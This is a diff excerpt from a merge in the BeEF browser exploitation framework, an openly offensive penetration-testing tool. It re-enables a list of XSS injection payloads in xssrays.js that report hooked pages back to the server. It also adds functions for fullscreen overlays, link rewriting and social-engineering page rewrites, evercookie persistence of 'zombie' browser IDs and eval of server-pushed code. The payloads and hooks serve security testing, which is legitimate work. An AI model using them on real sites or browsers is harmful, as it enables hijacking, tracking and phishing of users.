Merge pull request #924 from phihag/install-pipeline-instead-of-fifo

Use a pipe instead of a fifo during installation

.gitignore

@@ -3,3 +3,6 @@ test/msf-test
 custom-config.yaml
 .DS_Store
 .gitignore
+.rvmrc
+
+*.lock

Gemfile

@@ -9,13 +9,12 @@
 # Gems only required on Windows, or with specific Windows issues
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
   gem "win32console"
-  gem "eventmachine", "1.0.0.beta.4.1"
-else
-  gem "eventmachine", "0.12.10"
 end
 
+gem "eventmachine", "1.0.3"
 gem "thin"
-gem "sinatra", "1.3.2"
+gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
 gem "jsmin", "~> 1.0.1"
 gem "ansi"

Rakefile

@@ -76,10 +76,10 @@ end
 @beef_process_id = nil;
 
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
   @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
   end

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.2.1-alpha
+0.4.4.7-alpha

beef

@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
+                     :port => config.get("beef.database.db_port"),
                      :username => config.get("beef.database.db_user"),
                      :password => config.get("beef.database.db_passwd"),
                      :database => config.get("beef.database.db_name"),

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.2.1-alpha'
+    version: '0.4.4.7-alpha'
     debug: false
 
     restrictions:
@@ -27,12 +27,20 @@ beef:
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
-        dns: "localhost"
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
 
+        # Allow one or multiple domains to access the RESTful API using CORS
+        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
@@ -43,14 +51,14 @@ beef:
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
-            enable: false
+            enable: true
             type: "apache" #supported: apache, iis
 
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 
@@ -72,6 +80,7 @@ beef:
 
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
+        db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"
@@ -91,6 +100,10 @@ beef:
 
     crypto_default_value_length: 80
 
+    # Enable client-side debugging
+    client:
+        debug: false
+
     # You may override default extension configuration parameters here
     extension:
         requester:

core/filters/browser.rb

@@ -22,7 +22,7 @@ module Filters
   def self.is_valid_browsertype?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 250
     return false if has_non_printable_char?(str)
     true
   end
@@ -123,9 +123,9 @@ module Filters
     return true if not is_non_empty_string?(str)
     return false if str.length > 1000
     if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
     end
   end
 

core/main/client/beef.js

@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
+                /**
+                 * Adds a function to display debug messages (wraps console.log())
+                 * @param: {string} the debug string to return
+                 */
+                debug: function(msg) {
+                    if (!<%= @client_debug %>) return;
+                    if (typeof console == "object" && typeof console.log == "function") {
+                        console.log(msg);
+                    } else {
+                        // TODO: maybe add a callback to BeEF server for debugging purposes
+                        //window.alert(msg);
+                    }
+                },
+
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.

core/main/client/dom.js

@@ -76,6 +76,30 @@ beef.dom = {
 		
 		return iframe;
 	},
+
+	/**
+	 * Returns the highest current z-index
+	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return: {Integer} Highest z-index in the DOM
+	 * OR
+	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 */
+	getHighestZindex: function(include_id) {
+		var highest = {'height':0, 'elem':''};
+		$j('*').each(function() {
+			var current_high = parseInt($j(this).css("zIndex"),10);
+			if (current_high > highest.height) {
+				highest.height = current_high;
+				highest.elem = $j(this).attr('id');
+			}
+		});
+
+		if (include_id) {
+			return highest;
+		} else {
+			return highest.height;
+		}
+	},
 	
 	/**
      * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+		if (type == 'hidden') {
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
+		} else if (type == 'fullscreen') {
+			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		} else {
+			css = styles;
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
 		if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
             }
         });
     },
+
+    /**
+     * Load a full screen div that is black, or, transparent
+     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
+     *           // By default this is 70 
+     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+     *           // By default this will use beef.dom.getHighestZindex to always go to the top
+     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+     *           // By default this is #000000
+     */
+	grayOut: function(vis, options) {
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	},
+
+	/**
+	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
+	 *  or, re-writing a document this is useful.
+	 */
+	removeStylesheets: function() {
+		$j('link[rel=stylesheet]').remove();
+		$j('style').remove();
+	},
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -178,6 +278,23 @@ beef.dom = {
 		}).length;
 	},
 
+	/**
+	 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
+	 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
+	 * @param: {String} url: the url to be rewritten
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteLinksClickEvents: function(url, selector) {
+		var sel = (selector == null) ? 'a' : selector;
+		return $j(sel).each(function() {
+			if ($j(this).attr('href') != null)
+			{
+				$j(this).click(function() {this.href=url});
+			}
+		}).length;
+	},
+
 	/**
      * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
 	 * @param: {String} old_protocol: the old link protocol to be rewritten
@@ -275,7 +392,7 @@ beef.dom = {
             }
             content += "</object>";
         }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
 
             if (codebase != null) {
                 content = "" +
@@ -294,24 +411,25 @@ beef.dom = {
             }
             content += "</applet>";
         }
-        if (beef.browser.isFF()) {
-            if (codebase != null) {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            } else {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            }
-
-            if (params != null) {
-                content += beef.dom.parseAppletParams(params);
-            }
-            content += "</embed>";
-        }
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
+//        if (beef.browser.isFF()) {
+//            if (codebase != null) {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            } else {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            }
+//
+//            if (params != null) {
+//                content += beef.dom.parseAppletParams(params);
+//            }
+//            content += "</embed>";
+//        }
         $j('body').append(content);
     },
 
@@ -358,11 +476,11 @@ beef.dom = {
      * @params: {String} rport: remote port
      * @params: {String} commands: protocol commands to be executed by the remote host:port service
      */
-    createIframeIpecForm: function(rhost, rport, commands){
+    createIframeIpecForm: function(rhost, rport, path, commands){
         var iframeIpec = beef.dom.createInvisibleIframe();
 
         var formIpec = document.createElement('form');
-        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
         formIpec.setAttribute('method',  'POST');
         formIpec.setAttribute('enctype', 'multipart/form-data');
 

core/main/client/geolocation.js

@@ -32,14 +32,14 @@ beef.geolocation = {
 
         $j.ajax({
             error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                 beef.net.send(command_url, command_id, "latitude=" + latitude
                              + "&longitude=" + longitude
                              + "&osm=UNAVAILABLE"
                              + "&geoLocEnabled=True");
                 },
             success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                 var jsonResp = $j.parseJSON(data);
 
                 beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
         navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
         		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                 beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:

core/main/client/hardware.js

@@ -126,4 +126,4 @@ beef.hardware = {
 	}
 };
 
-beef.regCmp('beef.net.hardware');
+beef.regCmp('beef.hardware');

core/main/client/init.js

@@ -13,7 +13,8 @@
  * and will have a new session id. The new session id will need to know
  * the brwoser details. So sendback the browser details again.
  */
-BEEFHOOK = beef.session.get_hook_session_id();
+
+beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
     beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
             }
             return false;
         }
@@ -46,7 +47,7 @@ window.onclose = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onclose - couldn't execute callback: " + e.message);
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
             }
             return false;
         }

core/main/client/logger.js

@@ -50,6 +50,7 @@ beef.logger = {
 	 */
 	start: function() {
 
+		beef.browser.hookChildFrames();
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();

core/main/client/net/dns.js

@@ -43,7 +43,7 @@ beef.net.dns = {
 
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }

core/main/client/net/xssrays.js

@@ -49,22 +49,20 @@ beef.net.xssrays = {
     //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
     vectors: [
 
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
-//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
     // util function. Print string to the console only if the debug flag is on and the browser is not IE.
     printDebug:function(log) {
         if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
         }
     },
 
@@ -340,8 +338,8 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                 beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                 beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                 exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                         beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                         form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

core/main/client/session.js

@@ -13,7 +13,8 @@ beef.session = {
 	
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
+    beefhook: "<%= @hook_session_name %>",
 	
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
 	 */
   	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		
 		// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
 	 */
   	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	
 	/**

core/main/client/updater.js

@@ -15,6 +15,7 @@ beef.updater = {
 	
 	// XHR-polling timeout.
     xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
+    beefhook: "<%= @hook_session_name %>",
 	
 	// A lock.
 	lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
 	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });

core/main/client/websocket.js

@@ -53,9 +53,10 @@ beef.websocket = {
         };
 
         this.socket.onmessage = function (message) {
-            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
-            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
-            eval(message.data);
+            // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
+            // That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
+            // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
+            new Function(message.data)();
         };
 
         this.socket.onclose = function () {

core/main/constants/hardware.rb

@@ -34,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'

core/main/handlers/browserdetails.rb

@@ -68,6 +68,7 @@ module BeEF
                       }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
+          #puts "HTTP Headers: #{zombie.httpheaders}"
 
           # add a log entry for the newly hooked browser
           BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # detect browser proxy
+          using_proxy = false
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'PROXY_CONNECTION',
+            'PROXY_AUTHENTICATE',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR',
+            'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.nil?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
           # get and store browser version
           browser_version = get_param(@data['results'], 'BrowserVersion')
           if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -239,6 +290,14 @@ module BeEF
             self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasFoxit
+          has_foxit = get_param(@data['results'], 'HasFoxit')
+          if BeEF::Filters.is_valid_yes_no?(has_foxit)
+            BD.set(session_id, 'HasFoxit', has_foxit)
+          else
+            self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasWebSocket
           has_web_socket = get_param(@data['results'], 'HasWebSocket')
           if BeEF::Filters.is_valid_yes_no?(has_web_socket)
@@ -247,6 +306,14 @@ module BeEF
             self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasWebRTC
+          has_webrtc = get_param(@data['results'], 'HasWebRTC')
+          if BeEF::Filters.is_valid_yes_no?(has_webrtc)
+            BD.set(session_id, 'HasWebRTC', has_webrtc)
+          else
+            self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasActiveX
           has_activex = get_param(@data['results'], 'HasActiveX')
           if BeEF::Filters.is_valid_yes_no?(has_activex)
@@ -279,6 +346,14 @@ module BeEF
             self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasWMP
+          has_wmp = get_param(@data['results'], 'HasWMP')
+          if BeEF::Filters.is_valid_yes_no?(has_wmp)
+            BD.set(session_id, 'HasWMP', has_wmp)
+          else
